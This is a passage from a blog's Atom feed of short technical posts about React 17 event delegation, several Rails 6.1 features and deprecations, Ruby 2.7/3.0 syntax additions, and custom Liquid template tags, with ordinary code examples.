&lt;tr&gt;            &lt;td&gt;              &lt;select value={this.state.country}                onChange={this.handleChange}              &gt;                &lt;option value=&quot;&quot;&gt;--Select--&lt;/option&gt;                &lt;option value=&quot;India&quot;&gt;India&lt;/option&gt;                &lt;option value=&quot;US&quot;&gt;US&lt;/option&gt;                &lt;option value=&quot;Dubai&quot;&gt;Dubai&lt;/option&gt;              &lt;/select&gt;            &lt;/td&gt;            &lt;td&gt;              {this.state.country}            &lt;/td&gt;          &lt;/tr&gt;        &lt;/tbody&gt;      &lt;/table&gt;    );  }}ReactDOM.render(&lt;CountryDropDown /&gt;, document.getElementById('react-root'));</code></pre><p>Attaching change event to the main div</p><pre><code class="language-javascript">document.getElementById(&quot;main&quot;).addEventListener(  &quot;change&quot;,  function (e) {    e.stopPropagation();  },  false);</code></pre><p>When a country is selected, we cannot see the selected country. Watch this video</p><p>&lt;iframewidth=&quot;100%&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/6BgfvUz_3JM&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>to see it in action.</p><p>The reason for this unexpected behavior is the <code>onChange</code> event of dropdownwhich is attached to the <code>document</code> node. The <code>change</code> event of the <code>main</code> divcontaining <code>e.stopPropagation()</code> prevents the <code>onChange</code> event of dropdown.</p><p>To fix such issues, React 17 no longer attaches event handlers at the documentlevel. Instead, it attaches them to the root DOM container into which React treeis rendered.</p><p><img src="/blog_images/2020/react-17-delegates-events-to-root-instead-of-document/react_17_event_delegation.png" alt="event delegation"></p><p>Image is taken from<a href="https://reactjs.org/blog/2020/08/10/react-v17-rc.html">React 17 blog</a>.</p><h2>Changes in React 17</h2><p>After changes in React 17, events are attached to the root DOM container intowhich the React tree is rendered. In our example, <code>onChange</code> event of dropdownwould be attached to the div with id <code>react-root</code>. This event would be triggeredwhen any country is selected rendering the expected behavior.</p><p>&lt;iframewidth=&quot;100%&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/6BgfvUz_3JM&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><h2>Note</h2><p>React 17 release candidate can be installed from<a href="https://reactjs.org/blog/2020/08/10/react-v17-rc.html#installation">here</a>.</p><p>Check out the earlier discussion on event delegation<a href="https://github.com/facebook/react/issues/13525">here</a> and the pull request<a href="https://github.com/facebook/react/pull/18195">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 deprecates structure:dump/load rake tasks]]></title>
       <author><name>Chetan Gawai</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-deprecates-rails-db-structure-dump"/>
      <updated>2020-09-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-deprecates-rails-db-structure-dump</id>
      <content type="html"><![CDATA[<p>Rails 6.1 <a href="https://github.com/rails/rails/pull/39470">deprecates</a><code>rails db:structure:load</code> and <code>rails db:structure:dump</code> tasks.</p><p>Before Rails 6.1, executing <code>rake db:schema:dump</code> would dump <code>db/schema.rb</code>file. And executing <code>rake db:structure:dump</code> would dump <code>db/structure.sql</code> file.</p><p>Rails provides <code>config.active_record.schema_format</code> setting for which the validvalues are <code>:ruby</code> or <code>:sql</code>. However, since there are specific tasks for<code>db:structure</code> and <code>db:schema</code> this value was not really being used.</p><h4>Changes in Rails 6.1</h4><p>In Rails 6.1 the Rails team decided to combine the two different tasks into asingle task. In Rails 6.1 <code>rails db:structure:dump</code> and<code>rails db:structure:load</code> have been deprecated and the following message wouldbe shown.</p><pre><code class="language-ruby">Using `bin/rails db:structure:dump` is deprecated and will be removed in Rails 6.2. Configure the format using `config.active_record.schema_format = :sql` to use `structure.sql` and run `bin/rails db:schema:dump` instead.</code></pre><p>Now Rails will start taking into the account value set for<code>config.active_record.schema_format</code>.</p><p><code>rails db:schema:dump</code> and <code>rails db:schema:load</code> would do the right thing basedon the value set for <code>config.active_record.schema_format</code>.</p><p>Check out the <a href="https://github.com/rails/rails/pull/39470">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3 adds endless method definition]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-adds-endless-method-definition"/>
      <updated>2020-09-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-adds-endless-method-definition</id>
      <content type="html"><![CDATA[<p>Ruby 3.0adds endless method definition.It enablesus to createmethod definitionswithout theneed of <code>end</code> keyword.It is marked as an experimental feature.</p><pre><code class="language-ruby"># endless method definition&gt;&gt; def raise_to_power(number, power) = number ** power&gt;&gt; raise_to_power(2, 5)=&gt; 32</code></pre><p>The discussion aroundit can be found <a href="https://bugs.ruby-lang.org/issues/16746">here</a>.Check out the<a href="https://github.com/ruby/ruby/pull/2996/files">pull request</a>for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds --minimal option support]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-minimal-option-support"/>
      <updated>2020-09-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-minimal-option-support</id>
      <content type="html"><![CDATA[<p><code>rails new my_app</code> creates a new Rails application fully loaded with all thefeatures.</p><p>If we want to omit some of the features then we needed to skip them like this.</p><pre><code class="language-bash"># before Rails 6.1$ rails new tiny_app    --skip-action-cable    --skip-action-mailer    --skip-action-mailbox    --skip-action-text    --skip-active-storage    --skip-bootsnap    --skip-javascript    --skip-spring    --skip-system-test    --skip-webpack-install    --skip-turbolinks</code></pre><p>Before Rails 6.1 it was not possible to skip things like <code>active_job</code> and<code>jbuilder</code>.</p><h2>Rails 6.1</h2><p>Rails 6.1 added a new option <code>--minimal</code>.</p><pre><code class="language-bash">$ rails new tiny_app --minimal</code></pre><p>All the following are excluded from this minimal Rails application.</p><ul><li>action_cable</li><li>action_mailbox</li><li>action_mailer</li><li>action_text</li><li>active_job</li><li>active_storage</li><li>bootsnap</li><li>jbuilder</li><li>spring</li><li>system_tests</li><li>turbolinks</li><li>webpack</li></ul><p>We can bundle webpack in this minimal app like this.</p><pre><code class="language-bash">$ rails new tiny_app --minimal webpack=react</code></pre><p>Database option can also be passed.</p><pre><code class="language-bash">$ rails new tiny_app --minimal --database postgresql webpack=react</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/39282">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds support to persist timezones of Active Job]]></title>
       <author><name>Chetan Gawai</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-add-timezone-support-in-active-job"/>
      <updated>2020-09-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-add-timezone-support-in-active-job</id>
      <content type="html"><![CDATA[<p>When a job is enqueued in Rails 6 using Active Job, the current timezone of ajob is <a href="https://github.com/rails/rails/pull/32085/">preserved</a> and then thispreserved timezone is restored when the job is finished executing.</p><p>Let's take an example of sale at Amazon.</p><p>Amazon would like to remind users across different timezones about its upcomingsale by sending an email. This task of sending a reminder would be processed asa background job.</p><p>&lt;b&gt;Before:&lt;/b&gt;</p><p>Before Rails 6, we had to pass timezone explicitly to the <code>perform</code> method ofthe job as shown below.</p><pre><code class="language-ruby">timezone = &quot;Eastern Time (US &amp; Canada)&quot;AmazonSaleJob.perform_later(Time.now, timezone)class AmazonSaleJob &lt; ApplicationJob  queue_as :default  def perform(time, timezone)    time = time.in_time_zone(timezone)    sale_start_time = localtime(2020, 12, 24)    if time &gt;= sale_start_time      puts &quot;Sale has started!&quot;      #Send an email stating Sale has started    else      sale_starts_in = (sale_start_time - time).div(3600)      puts &quot;Hang on! Sale will start in #{sale_starts_in} hours&quot;      #Send an email stating sales starts in sale_starts_in hours     end  end  private    def localtime(*args)      Time.zone ? Time.zone.local(*args) : Time.utc(*args)    endend</code></pre><p>&lt;b&gt;After:&lt;/b&gt;</p><p>After the changes in Rails 6, passing timezone to Job is now taken care of byRails.</p><pre><code class="language-ruby">timezone = &quot;Eastern Time (US &amp; Canada)&quot;Time.use_zone(timezone) do  AmazonSaleJob.perform_later(Time.zone.now)endclass AmazonSaleJob &lt; ApplicationJob  queue_as :default  def perform(time)    sale_start_time = localtime(2020, 12, 24)    if time &gt;= sale_start_time      puts &quot;Sale has started!&quot;      #Send an email stating Sale has started    else      sale_starts_in = (sale_start_time - time).div(3600)      puts &quot;Hang on! Sale will start in #{sale_starts_in} hours&quot;      #Send an email stating sales starts in sale_starts_in hours     end   end  private    def localtime(*args)      Time.zone ? Time.zone.local(*args) : Time.utc(*args)    endend</code></pre><p>Rails 6 also propagates timezone to all the subsequent nested jobs.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds Beginless Range]]></title>
       <author><name>Ashwath Biradar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-adds-beginless-range"/>
      <updated>2020-08-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-adds-beginless-range</id>
      <content type="html"><![CDATA[<p>Ruby 2.7 added support for<a href="https://ruby-doc.org/core-2.7.0/Range.html#class-Range-label-Beginless-2FEndless+Ranges">Beginless Range</a>which makes the start of range an optional parameter.</p><p><code>(..100)</code> is a Beginless Range and it is equivalent to <code>(nil..100)</code>.</p><p>Let's see how Beginless Range could be used.</p><pre><code class="language-ruby">&gt; array = (1..10).to_a# Select first 6 elements&gt; array[..5]=&gt; [1, 2, 3, 4, 5, 6]# Select first 5 elements&gt; array[...5]=&gt; [1, 2, 3, 4, 5]# grep (INFINITY..5) in (1..5)&gt; (1..10).grep(..5)=&gt; [1, 2, 3, 4, 5]# (..100) is equivalent to (nil..100)&gt; (..100) == (nil..100)=&gt; true</code></pre><p>Here is another example where in the <code>case</code> statement the condition can be readas <code>below the specified level</code>.</p><pre><code class="language-ruby">case temperaturewhen ..-15  puts &quot;Deep Freeze&quot;when -15..8  puts &quot;Refrigerator&quot;when 8..15  puts &quot;Cold&quot;when 15..25  puts &quot;Room Temperature&quot;when (25..)   # Kindly notice the brackets here  puts &quot;Hot&quot;end</code></pre><p>It can also be used for defining constants for ranges.</p><pre><code class="language-ruby">TEMPERATURE = {  ..-15  =&gt; :deep_freeze,  -15..8 =&gt; :refrigerator,  8..15  =&gt; :cold,  15..25 =&gt; :room_temperature,  25..   =&gt; :hotend</code></pre><p>Using Beginless Range in DSL makes it easier to write conditions and it looksmore natural.</p><pre><code class="language-ruby"># In RailsUser.where(created_at: (..DateTime.now))# User Load (2.2ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;created_at&quot; &lt;= $1 LIMIT $2  [[&quot;created_at&quot;, &quot;2020-08-05 15:00:19.111217&quot;], [&quot;LIMIT&quot;, 11]]# In RubySpecruby_version(..'1.9') do# Tests for old Rubyend</code></pre><p>Here is the relevant<a href="https://github.com/ruby/ruby/commit/95f7992b89efd35de6b28ac095c4d3477019c583">commit</a>and <a href="https://bugs.ruby-lang.org/issues/14799">discussion</a> regarding this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds including & excluding method on Enumerables]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-array-including-excluding-and-enumerable-including-excluding"/>
      <updated>2020-08-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-array-including-excluding-and-enumerable-including-excluding</id>
      <content type="html"><![CDATA[<p>Rails 6 added <code>including</code> and <code>excluding</code> on Array and Enumerable.</p><h4>Array#including and Enumerable#including</h4><p><code>including</code> can be used to extend a collection in a more object oriented way. Itdoes not mutate the original collection but returns a new collection which isthe concatenation of the given collections.</p><pre><code class="language-ruby"># multiple arguments can be passed to including&gt; &gt; [1, 2, 3].including(4, 5)&gt; &gt; =&gt; [1, 2, 3, 4, 5]# another enumerable can also be passed to including&gt; &gt; [1, 2, 3].including([4, 5])&gt; &gt; =&gt; [1, 2, 3, 4, 5]&gt; &gt; %i(apple orange).including(:banana)&gt; &gt; =&gt; [:apple, :orange, :banana]# return customers whose country_code is IN along with the prime customers&gt; &gt; Customer.where(country_code: &quot;IN&quot;).including(Customer.where(prime: true))</code></pre><h4>Array#excluding and Enumerable#excluding</h4><p>It returns a copy of the enumerable excluding the given collection.</p><pre><code class="language-ruby"># multiple arguments can be passed to including&gt; &gt; [11, 22, 33, 44].excluding([22, 33])&gt; &gt; =&gt; [11, 44]&gt; &gt; %i(ant bat cat).excluding(:bat)&gt; &gt; =&gt; [:ant, :cat]# return all prime customers except those who haven't added their phone&gt; &gt; Customer.where(prime: true).excluding(Customer.where(phone: nil))</code></pre><p><code>Array#excluding and Enumerable#excluding</code> replaces the already existing method<code>without</code> which in Rails 6 is now aliased to <code>excluding</code>.</p><pre><code class="language-ruby">&gt; &gt; [11, 22, 33, 44].without([22, 33])&gt; &gt; =&gt; [11, 44]</code></pre><p><code>excluding</code> and <code>including</code> helps to shrink or extend a collection without usingany operator.</p><p>Check out the<a href="https://github.com/rails/rails/commit/bfaa3091c3c32b5980a614ef0f7b39cbf83f6db3">commit</a>for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 raises error on rollback when using multiple database]]></title>
       <author><name>Srijan Kapoor</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-raises-on-db-rollback-for-multiple-database-applications"/>
      <updated>2020-08-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-raises-on-db-rollback-for-multiple-database-applications</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds support to handle <code>db:rollback</code> in case of multiple databaseapplication.</p><p>Prior to this change, on executing <code>db:rollback</code> Rails used to rollback thelatest migration from the primary database. If we passed on a <code>[:NAME]</code> optionalong with to specify the database, we used to get an error. Check out the<a href="https://github.com/rails/rails/issues/38513">issue</a> for more details.</p><h4>Rails 6.0.0</h4><pre><code class="language-ruby">&gt; rails db:rollback:secondaryrails aborted!Don't know how to build task `db:rollback:secondary` (See the list of available tasks with `rails --tasks`)Did you mean?  db:rollback</code></pre><p>Staring with Rails 6.1, we need to pass the database name along with<code>db:rollback:[NAME]</code> otherwise a <code>RuntimeError</code> is raised.</p><h4>Rails 6.1.0</h4><pre><code class="language-ruby">&gt; rails db:rollbackrails aborted!You're using a multiple database application. To use `db:migrate:rollback` you must run the namespaced task with a VERSION. Available tasks are db:migrate:rollback:primary and db:migrate:rollback:secondary.&gt; rails db:rollback:primary== 20200731130500 CreateTeams: reverting ======================================-- drop_table(:teams)   -&gt; 0.0060s== 20200731130500 CreateTeams: reverted (0.0104s) =============================</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/38770">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Render a liquid template when the template is a liquid template]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/render-liquid-templates-when-the-template-refers-to-other-liquid-templates"/>
      <updated>2020-08-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/render-liquid-templates-when-the-template-refers-to-other-liquid-templates</id>
      <content type="html"><![CDATA[<p><a href="https://shopify.github.io/liquid/">Shopify's Liquid Templates</a>is a great way for templatingin Ruby on Rails applications.</p><p>If the template isas simple as this onethen there are no issues.</p><pre><code class="language-ruby">{% raw %}{% if user %}  Hello {{ user.name }}{% endif %}{% endraw %}</code></pre><p>However sometimeswe have a liquid templatewhich is using another liquid template.Here is an example.</p><h5>home.liquid</h5><pre><code class="language-handlebars">{% raw %}&lt;!DOCTYPE html&gt;&lt;html&gt;  &lt;head&gt;    &lt;style&gt;{% asset 'main.css' %}&lt;/style&gt;  &lt;/head&gt;  &lt;body&gt;    {% partial 'header' %}    &lt;h1&gt;Home Page&lt;/h1&gt;  &lt;/body&gt;&lt;/html&gt;{% endraw %}</code></pre><p>In the above case <code>home.liquid</code> is using two other liquid templates <code>main.css</code> and <code>header.liquid</code>.</p><p>Let' see what these templates look like.</p><h5>main.css</h5><pre><code class="language-handlebars">{% raw %}* {  color: {{ theme.text_color }};}a {  color: {{ theme.link_color }};}{% endraw %}</code></pre><h5>header.liquid</h5><pre><code class="language-handlebars">{% raw %}&lt;nav&gt;{{ organization.name }}&lt;/nav&gt;{% endraw %}</code></pre><p>In order to include the assets and the partialswe need to create liquid tags.</p><p>Let's create a tag which will handle assets.</p><pre><code class="language-ruby"># app/lib/liquid/tags/asset.rbmodule Liquidmodule Tagsclass Asset &lt; Liquid::Tagdef initialize(tag_name, name, tokens)super@name = name.strip.remove(&quot;'&quot;)end      def render(context)        new_context = context.environments.first        asset = Template.asset.find_by(filename: @name)        Liquid::Template.parse(asset.content).render(new_context).html_safe      end    endendend</code></pre><p>Let's create a tag that will handle partials.</p><pre><code class="language-ruby"># app/lib/liquid/tags/partial.rbmodule Liquidmodule Tagsclass Partial &lt; Liquid::Tagdef initialize(tag_name, name, tokens)super@name = name.strip.remove(&quot;'&quot;)end      def render(context)        new_context = context.environments.first        # Remember here we are not passing extension        asset = Template.partial.find_by(filename: @name + &quot;.liquid&quot;)        Liquid::Template.parse(asset.content).render(new_context).html_safe      end    endendend</code></pre><p>Let's create a new initializer and we need to registerthese tags in that initializer.</p><pre><code class="language-ruby"># config/initializers/liquid.rbrequire 'liquid/tags/asset'require 'liquid/tags/partial'Liquid::Template.register_tag('asset', Liquid::Tags::Asset)Liquid::Template.register_tag('partial', Liquid::Tags::Partial)</code></pre><p>Restart the server and now we can render the <code>home.liquid</code> templatelike this.</p><pre><code class="language-ruby">template = Template.template.find_by(filename: &quot;home.liquid&quot;)attributes = {organization: {name: &quot;Example&quot;},theme: {text_color: &quot;#000000&quot;,link_color: &quot;#DBDBDB&quot;}}Liquid::Template.parse(template.content).render(attributes).html_safe</code></pre><p>Here we havea simple implementation ofthe tags.We can do much more, if needed, likelooping over itemsto parse each item from the partial.That can be doneby registering a separate tag forthe item and passing inthe id of the item so thatthe specific item can be found and parsed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 deprecates the use of exit statements in transaction]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-deprecates-the-use-of-return-break-or-throw-to-exit-a-transaction-block"/>
      <updated>2020-08-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-deprecates-the-use-of-return-break-or-throw-to-exit-a-transaction-block</id>
      <content type="html"><![CDATA[<p>Rails 6.1 deprecates the use of <code>return</code>, <code>break</code> or <code>throw</code> to exit atransaction block.</p><h4>return / break</h4><pre><code class="language-ruby">&gt;&gt; Post.transaction do&gt;&gt;   @post.update(post_params)&gt;&gt;&gt;&gt;   break # or return&gt;&gt; end# =&gt; TRANSACTION (0.1ms)  begin transaction# =&gt; DEPRECATION WARNING: Using `return`, `break` or `throw` to exit a transaction block is# =&gt; deprecated without replacement. If the `throw` came from# =&gt; `Timeout.timeout(duration)`, pass an exception class as a second# =&gt; argument so it doesn't use `throw` to abort its block. This results# =&gt; in the transaction being committed, but in the next release of Rails# =&gt; it will rollback.# =&gt; TRANSACTION (0.8ms)  commit transaction</code></pre><h4>throw</h4><pre><code class="language-ruby">&gt;&gt; Timeout.timeout(1) do&gt;&gt;   Post.transaction do&gt;&gt;     @post.update(post_params)&gt;&gt;&gt;&gt;     sleep 3 # simulate slow request&gt;&gt;   end&gt;&gt; end# =&gt; TRANSACTION (0.1ms)  begin transaction# =&gt; DEPRECATION WARNING: Using `return`, `break` or `throw` to exit a transaction block is# =&gt; deprecated without replacement. If the `throw` came from# =&gt; `Timeout.timeout(duration)`, pass an exception class as a second# =&gt; argument so it doesn't use `throw` to abort its block. This results# =&gt; in the transaction being committed, but in the next release of Rails# =&gt; it will rollback.# =&gt; TRANSACTION (1.6ms)  commit transaction# =&gt; Completed 500 Internal Server Error in 1022ms (ActiveRecord: 3.2ms | Allocations: 9736)# =&gt; Timeout::Error (execution expired)</code></pre><p>Here, even when the error was thrown the transaction is committed. This issomething which is going to change in the future versions.</p><p>This is done because currently, when a transaction block is wrapped in<code>Timeout.timeout(duration)</code> i.e. without second argument(an exception class)then it uses <code>throw</code> to exit the transaction.</p><h4>Solution</h4><pre><code class="language-ruby">&gt;&gt; Timeout.timeout(1, Timeout::Error) do&gt;&gt;   Post.transaction do&gt;&gt;     @post.update(post_params)&gt;&gt;&gt;&gt;     sleep 3 # simulate slow request&gt;&gt;   end&gt;&gt; end# =&gt; TRANSACTION (0.1ms)  begin transaction# =&gt; TRANSACTION (0.7ms)  rollback transaction# =&gt; Timeout::Error (execution expired)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/29333">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 creates abstract classes in multiple database mode]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-automatically-generates-abstract-class-when-using-multiple-databases"/>
      <updated>2020-08-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-automatically-generates-abstract-class-when-using-multiple-databases</id>
      <content type="html"><![CDATA[<p>Rails started supporting multiple databases from Rails 6.0. To use a specificdatabase, we can specify the database connection in the model using<code>connects_to</code>. In the following case we want <code>Person</code> model to connect to <code>crm</code>database.</p><pre><code class="language-ruby">class Person &lt; ApplicationRecordconnects_to database: { writing: :crm }end</code></pre><p>As the application grows, more and more models start sharing the same database.Now a lot of models may contain <code>connects_to</code> call to the same database.</p><pre><code class="language-ruby">class Person &lt; ApplicationRecordconnects_to database: { writing: :crm }endclass Order &lt; ApplicationRecordconnects_to database: { writing: :crm }endclass Sale &lt; ApplicationRecordconnects_to database: { writing: :crm }end</code></pre><p>In order to avoid the duplication, we can create an abstract class connecting toa database and manually inherit all other models from that class. This couldlook like this.</p><pre><code class="language-ruby">class CrmRecord &lt; ApplicationRecordself.abstract_class = trueconnects_to database: { writing: :crm }endclass Person &lt; CrmRecordendclass Order &lt; CrmRecordendclass Sale &lt; CrmRecordend</code></pre><h4>Rails 6.1</h4><p>Before Rails 6.1 we had no choice but to create that abstract class manually.Rails 6.1 allows us to generate an abstract class when we are generating a modelusing <code>scaffold</code>.</p><pre><code class="language-bash">$ rails g scaffold Person name:string --database=crm</code></pre><p>It creates an abstract class with the database's name appended with <code>Record</code>.The generated model automatically inherits from the new abstract class.</p><pre><code class="language-ruby"># app/models/users_record.rbclass CrmRecord &lt; ApplicationRecordself.abstract_class = trueconnects_to database: { writing: :crm }end# app/models/admin.rbclass Person &lt; CrmRecordend</code></pre><p>If the abstract class already exists, it is not created again. We can also usean existing class as the abstract class by passing <code>parent</code> option to thescaffold command.</p><pre><code class="language-bash">$ rails g scaffold Customer name:string --database=crm --parent=PrimaryRecord</code></pre><p>This skips generating <code>CrmRecord</code> class as we have specified Rails to use<code>PrimaryRecord</code> abstract class as its parent.</p><p>Check out the <a href="https://github.com/rails/rails/pull/39866">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds annotate_rendered_view_with_filenames for views]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-annotate_rendered_view_with_filenames-to-annotate-html-output"/>
      <updated>2020-07-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-annotate_rendered_view_with_filenames-to-annotate-html-output</id>
      <content type="html"><![CDATA[<p>Rails 6.1 makes it easier to debug rendered HTML by adding the name of eachtemplate used.</p><h4>Rails 6.1</h4><p>Add the following line in <code>development.rb</code> file to enable this feature.</p><pre><code class="language-ruby">config.action_view.annotate_rendered_view_with_filenames = true</code></pre><p>Now the rendered HTML will contain comment indicating the beginning and end ofeach template.</p><p>Here is an example.</p><p><img src="/blog_images/2020/rails-6-1-adds-annotate_rendered_view_with_filenames-to-annotate-html-output/annotate_html_with_template_name.png" alt="Annotated HTML output"></p><p>In the image we can see the <code>begin</code> and <code>end</code> for each of the templates. Ithelps a lot in debugging webpages to find out which template is rendered. Checkout the <a href="https://github.com/rails/rails/pull/38848">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 allows configuring default value of enum attributes]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-allows-enums-attributes-to-have-default-value"/>
      <updated>2020-07-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-allows-enums-attributes-to-have-default-value</id>
      <content type="html"><![CDATA[<p>Rails 6.1 makes it easier to configure a default value for Active Record enumattributes.</p><p>Let's take an example of blog posts with status and category columns.</p><pre><code class="language-ruby">class Post &lt; ApplicationRecord  enum status: %i[draft reviewed published]  enum category: { rails: &quot;Rails&quot;, react: &quot;React&quot; }end</code></pre><p>Before Rails 6.1, defaults for enum attributes can be configured by applying<code>default</code> on the database level.</p><pre><code class="language-ruby">class AddColumnStatusToPosts &lt; ActiveRecord::Migration[6.0]  def change    add_column :posts, :status, :integer, default: 0    add_column :posts, :category, :string, default: &quot;Rails&quot;  endend</code></pre><p>After Rails 6.1, defaults for enum attributes can be configured directly in thePost model using <code>_default</code> option.</p><pre><code class="language-ruby">class Post &lt; ApplicationRecord  enum status: %i[draft reviewed published], _default: &quot;draft&quot;  enum category: { rails: &quot;Rails&quot;, react: &quot;React&quot; }, _default: &quot;Rails&quot;end</code></pre><p>The new approach to set enum defaults has following advantages. Let's understandkeeping the context of Post model with category as an example.</p><ul><li>When the category default value changes from <code>Rails</code> to <code>React</code>. We have toadd a new migration in Rails 6 and previous versions to update the databasecolumn default.</li><li>Let say the default value for post category(i.e: <code>Rails</code>) is removed from theenum from Post model. Rails 6 and previous versions wouldn't throw anexception and continue to work without setting any default value. Rails 6.1with new syntax would raise an exception.</li></ul><p>Check out the <a href="https://github.com/rails/rails/pull/39820">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds support for where with a comparison operator]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-support-for-where-with-comparison-operator"/>
      <updated>2020-07-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-support-for-where-with-comparison-operator</id>
      <content type="html"><![CDATA[<p><strong><em>Please note that the PR discussed in this blog was<a href="https://github.com/rails/rails/issues/41271">reverted</a>.</em></strong></p><p>Rails 6.1 adds support to comparison operator in the <code>where</code> clause. The fourcomparison operators supported are:</p><ul><li>Greater than (&gt;).</li><li>Greater than equal to (&gt;=).</li><li>Less than (&lt;).</li><li>Less than equal to (&lt;=).</li></ul><p>The comparison operator is also supported by the finder methods in ActiveRecordwhich internally uses where clause, for example: <code>find_by</code>, <code>destroy_by</code>,<code>delete_by</code>.</p><p>The new style for comparisons has to follow advantages:</p><ul><li>The <code>where</code> clause with the comparison operator doesn't raise an exceptionwhen <code>ActiveRecord::Relation</code> uses ambiguous column name.</li><li>The <code>where</code> clause with the comparison operator handle proper precision of thedatabase columns.</li></ul><p>Before Rails 6.1, to add a condition with comparison in where clause, we had toadd raw SQL notation.</p><h4>Rails 6.0.0</h4><pre><code class="language-ruby">&gt;&gt; Post.where(&quot;DATE(published_at) &gt; DATE(?)&quot;, Date.today)# =&gt; &lt;ActiveRecord::Relation [...]&gt;&gt;&gt; Post.find_by(&quot;likes &lt; ?&quot;, 10)# =&gt; &lt;ActiveRecord::Relation [...]&gt;# Following query on execution would raise exception.&gt;&gt; Post.joins(:comments).where(&quot;likes &gt; 10&quot;)# =&gt; ambiguous column name: id</code></pre><h4>Rails 6.1.0</h4><pre><code class="language-ruby">&gt;&gt; Post.where(&quot;published_at &gt;&quot;: Date.today)# =&gt; &lt;ActiveRecord::Relation [...]&gt;&gt;&gt; Post.find_by(&quot;likes &lt;&quot;: 10)# =&gt; &lt;ActiveRecord::Relation [...]&gt;# Following query on execution would NOT raise exception.&gt;&gt; Post.joins(:comments).where(&quot;likes &gt;&quot;: 10)# =&gt; &lt;ActiveRecord::Relation [...]&gt;</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/39613">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 tracks Active Storage variant in the database]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-tracks-active-storage-variant-in-the-database"/>
      <updated>2020-06-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-tracks-active-storage-variant-in-the-database</id>
      <content type="html"><![CDATA[<p>Active Storage variants are the transformation of the original image. Thesevariants can be used as thumbnails, avatars, etc.</p><p>Active Storage generates variants <strong>on demand</strong> by downloading the originalimage. The image is transformed into a variant and is stored to the third partyservices like S3.</p><p>When a request to fetch a variant for an Active Storage object is made, Railschecks if the variant is already been processed and is already available on S3or not. But to do so Rails has to make a call to find out if the variant isavailable on S3. This extra call adds to the latency.</p><p>Active Storage has to wait until the image variant check call is completedbecause S3 might not return the image when a GET request is made due to eventual<a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/Introduction.html#ConsistencyModel">consistency</a>.This way Rails avoid downloading a broken image from S3 and uploading brokenimage variant to S3 in case the variant is not present.</p><p>In Rails 6.1, Active Storage tracks the presence of the variant in the database.This change avoids unnecessary variant presence remote request made to the S3and directly fetches or generates a image 